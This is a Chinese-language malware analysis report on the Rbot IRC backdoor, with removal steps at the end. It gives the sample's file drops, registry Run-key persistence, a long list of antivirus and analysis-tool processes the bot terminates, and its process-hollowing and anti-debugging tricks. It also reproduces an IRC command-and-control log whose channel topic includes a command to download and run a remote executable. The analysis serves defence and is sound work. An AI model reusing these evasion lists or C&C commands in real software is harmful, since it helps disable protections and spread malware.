Backdoor/Win32.Rbot.kti行为分析
一、 病毒标签:病毒名称: Backdoor/Win32.Rbot.kti
病毒类型: 后门
文件 MD5: 71A95D2E81C84B3560CE0714195CC635
公开范围: 完全公开
危害等级: 4
文件长度: 108,544 字节
感染系统: Windows98以上版本
开发工具: Borland Delphi 6.0 - 7.0
二、 病毒描述:
该病毒文件为僵尸后门类,该病毒对数据资源进行了加密处理,病毒运行后查找标题为"The Wireshark Network Analyzer"(抓包工具)的窗口,找到之后向该窗口发送WM_CLOSE消息并关闭该窗口,遍历进程查找filemon.exe、regmon.exe、procmon.exe相关进程,找到含有以上进程后病毒则退出,遍历进程查找并结束Ollydbg.exe进程,创建病毒进程,读取病毒创建进程的基址,申请内存空间,将病毒数据写入到创建的进程内存当中,调用函数恢复进程线程句柄使进程正常运行,将自身文件拷贝到临时目录下运行,遍历进程查找多款安全软件进程找到后将其结束,连接网络请求多个网页数据下载病毒文件到本地并隐藏运行。
三、 原样本行为分析:
本地行为:
1、复制自身到%HomeDrive%文件夹下
%Windir%\logfile32.txt
%Documents and Settings%\当前用户\Local Settings\Temp\xfgnp.exe
%Documents and Settings%\当前用户\Local Settings\Temp\eraseme_75721.exe
2、新增注册表2处启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Microsoft Driver Setup
值: 字符串: "C:\DOCUME~1\a\LOCALS~1\Temp\\xfgnp.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Driver Setup
值: 字符串: "C:\DOCUME~1\a\LOCALS~1\Temp\\xfgnp.exe"
3、遍历进程查找并结束以下进程:
quhlpsvc.exe、apvxdwin.exe、qoeloader.exe、acaas.exe、acaegmgr.exe、acals.exe、acais.exe、ahnsdsv.exe、avguard.exe、avgnt.exe、avirarkd.exe、sched.exe、avcenter.exe、ashdisp.exe、ashserv.exe、aswupdsv.exe、ashmaisv.exe、ashwebsv.exe、avgwdsvc.exe、avgamsvr.exe、avgupsvc.exe、avgemc.exe、avgscanx.exe、avgupd.exe、avgui.exe、bdss.exe、uiscan.exe、xcommsvr.exe、livesrv.exe、vsserv.exe、bdagent.exe、aswclnr.exe、onlinent.exe、emlproxy.exe、scanwscs.exe、scanmsg.exe、upschd.exe、emlproui.exe、onlnsvc.exe、cateye.exe、qhfw332.exe、sensor.exe、opmo.exe、strtsvc.exe、acs.exe、drweb32w.exe、spiderml.exe、drwebscd.exe、almon.exe、alsvc.exe、clamwin.exe、clamtray.exe、cctray.exe、cfgmng32.exe、cafw.exe、capfasem.exe、capfupgrade.exe、cagloballight.exe、mdmcls32.exe、ccprovsp.exe、itmrtsvc.exe、svcprs32.exe、ppcltpriv.exe、umxcfg.exe、umxagent.exe、umxfwhlp.exe、umxpol.exe、inicio.exe、fprottray.exe、fpavserver.exe、fpwin.exe、fsm32.exe、fsgk32st.exe、fsdfwd.exe、fsma32.exe、nod32krn.exe、fsaua.exe、gdfirewalltray.exe、avktray.exe、gdfire.exe、avkproxy.exe、gdfwsvc.exe、avkservice.exe、avktunerservice.exe、avkwctl.exe、guardxkickoff.exe、guardxservice.exe、virusutilities.exe、k7systry.exe、k7tsecurity.exe、k7emlpxy.exe、k7fwsrvc.exe、k7pssrvc.exe、k7rtscan.exe、k7spmsrc.exe、k7tsmngr.exe、kav.exe、kavsvc.exe、mcagent.exe、mcvsrte.exe、mcvsshld.exe、mcshield.exe、mcupdate.exe、msmpeng.exe、msascui.exe、nod32kui.exe、nmain.exe、nod32.exe、nod32cc.exe、nod32m2.exe、tpsrv.exe、psctrls.exe、pavfnsvr.exe、pavprsrv.exe、pskmssvc.exe、avengine.exe、pshost.exe、psimsvc.exe、pavsrv51、exesrvload.exe、webproxy.exe、pavbckpt.exe、avgas.exe、pctsgui.exe、pctssvc.exe、pctstray.exe、pctsauxs.exe、pctav.exepctavsvc.exepxconsole.exepxagent、exerav.exe、ravlite.exe、ulibcfg.exe、ccenter.exe、ravtask.exe、scfmanager.exe、scfservice.exe、savservice.exe、savadminservice.exe、sbamtray.exe、sbamui.exe、sbamsvc.exe、rtvscan.exe、defwatch.exe、tnbutil.exe、sfctlcom.exe、tisspwiz.exe、ufseagnt.exe、ufnavi.exe、tmbmsrv.exe、tmpfw.exe、tmproxy.exe、tscfcommander.exe、filelocksetup.exe、vba32ldr.exe、vba32ads.exe、mkstray.exe、vrmonnt.exe、hsvcmod.exe、hpcsvc.exe、vrmonsvc.exe、hfacsvc.exe、vrfwsvc.exe、a2guard.exe、a2scan.exe、a2start.exe、a2service.exe、a2hijackfree.exe、avmenu.exe、arcavir.exe、arcacheck.exe、abregmon、exe、exe、filemonsv.exe、netmonsv.exe、update.exe、taskscheduler.exe、arcabit.core、configurator2.exe、arcabit、core.loggingservice.exe、cmain.exe、cavasm.exe、kvmonxp.kxp、kvxp.kxp、kvol.exe、kvsrvxp.exe、kavstart.exe、kpfw32.exe、kwatch.exe、kissvc.exe、kpfwsvc.exe、kav32.exe、kasmain.exe、kavpfw.exe、mksregmon.exe、mks、mail.exe、mks_scan.exe、mksvirmonsvc.exe、mksfwall.exe、mkspc.exe、mksupdate.exe、mksadminconsole.exe、nspsvc.exe、nspupsvc.exe、nspmain.exe、navqscan.exe、nspupdt.exe、nsutility.exe、zlclient.exe、vsmon.exe、cpf.exe、cmdagent.exe、ayagent.aye、ayservicent.aye、puscan.exe、npcgreenagent.npc、nsavsvc.npc、nsvmon.npc、360tray.exe、360hotfix.exe、360rpt.exe、360safe.exe、boxmod.exe、makereport.exe、ravmond.exe、alertman.exe、spidernt.exe、spiderui.exe、afmain.exe、fprot.exe、f-prot95.exe、fstop、.exe、fameh32.exe、fast.exe、fch32.exe、fih32.exe、fnrb32.exe
fp、wi、.exe、fprot.exe、fsaa.exe、fsav.exe、fsav32.exe、fsav530stbyb.exe、fsav530wtbyb.exe、fsav95.exe、fsgk32.exe、fsmb32.exe、ccsetup210.exe、vba32-personal-latest、english.exe、trendmicro_tispro_1、.1_1063_x32.exe、witsetup.exe、avinstall.exe、k7ts、setu、.exe、p08promo.exe、issdm_en、32.exe、vipre.exe、hookanlz.exe、srengldr.exe、ekrn.exe、egui.exe、compaq、propietario.exe、atf-cleaner.exe、safebootkeyrepair.exeotmoveit3.exehostsxpert.exedaft.exe、virus.exe、hijack、this.exe、mrt.exe、mrtstub.exe、windows-kb890930-v2、2.exe、hj.exe、elista.exe、penclean.exe、mbam、setup.exe、mbam.exe、avz.exe、jaja.exe、otmoveit.exembam、setup.exe、regmon.exe、combofix.bat、combofix.scr、combofix.com、command.com、ntvdm.exe、guard.exe、listo.exe、tcpview.exe、mmc.exe、regedit.com、regedit.scr、foldercure.exe、killautoplus.exe、myphotokiller.exe、reg.exe、regedit.exe、taskkill.exe、autoruns.exe、srengps.exe、combofix.exe、sdfix.exe、catchme.exe、gmer.exe、cf9409.exe、regunlocker.exetsnteval.exexp、taskmgrenab.exe、ccleaner.exe、superantispyware.exe、bootsafe.exe、srestore.exe、msncleaner.exe、buscareg.exe、kakasetupv6.exe、superkiller.exe、dubatool_av、killer、exe、delaydelfile.exe、seem.exe、bc5ca6a.exe、rootalyzer.exe、rootkitbuster.exe、helios.exe、darkspy105.exe、pavark.exe、aports.exe、fport.exe、portdetective.exe、portmonitor.exe、netstat.exe、ollydbg.exe、hjtinstall.exe、hjtsetup.exe、hijackthis、sfx.exe、hijackthis.exe、hijackthis、v2.exe、msnfix.exe、procexp.exe、taskman.exe、tasklist.exe、taskmon.exe、pskill.exe、rootkitrevealer.exe、fsbl.exe、fsb.exe、avgarkt.exe、rootkit、detective、exe、unhackme.exe、hackmon.exe、rkd.exe、rootkitno.exe、reanimator.exe、icesword.exe、lordpe.exe、pg2.exe、procdump.exe、processmonitor.exe、spybotsd160.exe、teatimer.exe、spybotsd.exe、wireshark.exe、apm.exe、apt.exe、asviewer.exe、cports.exe、cprocess.exe、dllcompare.exe、a2hijackfreesetup.exe、eulalyzersetup.exe、filealyz.exe、filefind.exe、fixpath.exe、hostsfilereader.exe、iefix.exe、avenger.exe、installwatchpro25.exe、killbox.exe、netalyz.exe、objmonsetup.exe、pgsetup.exe、fixbagle.exe、cureit.exe、procmon.exe、projectwhoisinstaller.exe、regalyz.exe、regcool.exe、registrar、lite、exe、regscanner.exeregshot.exe、regx2.exe、spf.exe、startdreck.exe、sysanalyzer_setup.exe、uniextract.exe、unlocker1.8.7.exe、ravp.exembam.exe、123.com、123.exe
网络行为:
1、连接IRC服务器等待控制
协议:TCP
连接服务器名:irc.ef***.com
域名或IP地址:
70.32.35.**:81
加入的 IRC 频道名:
JOIN #xx32
用户名:Ulfried
对目标主机的操作:
/*用户名*/
USER SP2-246 * 0 :A-738DF22C9CA04
/*昵称*/
NICK
/*服务器返回错误信息*/
:irc.ef***.com NOTICE AUTH :*** Looking up your hostname...
:irc.ef***.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:irc.ef***.com 001
:irc.ef***.com 002 : M0dded by uNkn0wn Crew
:irc.ef***.com 003
:irc.ef***.com 004 : www.uNkn0wn.eu - iD@uNkn0wn.eu
:irc.ef***.com 005
:irc.ef***.com 005
:irc.ef***.com 005
:irc.ef***.com 422 :MOTD File is missing
: MODE :+iwG
MODE -ix
JOIN #xx32
MODE -ix
JOIN #xx32
MODE -ix
JOIN #xx32
MODE -ix
JOIN #xx32
:!SP2-246@221.207.255.** JOIN :#xx32
:irc.ef***.com 332 #xx32 :.flushdns |.down -S |.update -S |.update http://94.76.194.***/33.exe c9h8j9a7n7m9.exe c9h8j9a7n7m9
:irc.ef***.com 333 #xx32 j 1269606912
PRIVMSG #xx32 :update; File download: 148.0KB to: C:\DOCUME~1\a\LOCALS~1\Temp\eraseme_75721.exe @ 37.0KB/sec.
:irc.ef***.com 404 #xx32 :You must have a registered nick (+r) to talk on this channel (#xx32)
QUIT gettin new bin .
ERROR :Closing Link: (Client hat die Verbindung getrennt)
连接:http://94.76.194.***/33.exe下载病毒文件
连接网络访问以下网址:
GET /proxyworld/azenv.php HTTP/1.1
Host: membres.lycos.fr
Cache-Control: no-cache
GET /proxyworld/azenv.php HTTP/1.1
Host: membres.multimania.fr
Cache-Control: no-cache
Connection: Keep-Alive
GET /proxyworld/azenv.php HTTP/1.1
Host: membres.multimania.fr
Cache-Control: no-cache
Connection: Keep-Alive
注1:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。
%Temp%= C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
%Windir%\ WINDODWS所在目录
%DriveLetter%\ 逻辑驱动器根目录
%ProgramFiles%\ 系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\ 当前用户文档根目录
注2:与IRC服务器的交互信息中,符号“/**/”内的数据是分析员对下一行或几行的注释信息,非为与服务器的交互信息内容。
四、 清除方案:
1、使用安天防线可彻底清除此病毒(推荐)。
请到安天网站下载:http://www.antiy.com
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1) 强行删除病毒衍生的文件
%Documents and Settings%\当前用户\Local Settings\Temp\xfgnp.exe
%Documents and Settings%\当前用户\Local Settings\Temp\eraseme_75721.exe
(2)恢复病毒修改的注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Microsoft Driver Setup
值: 字符串: "C:\DOCUME~1\a\LOCALS~1\Temp\\xfgnp.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Driver Setup
值: 字符串: "C:\DOCUME~1\a\LOCALS~1\Temp\\xfgnp.exe"
页:
[1]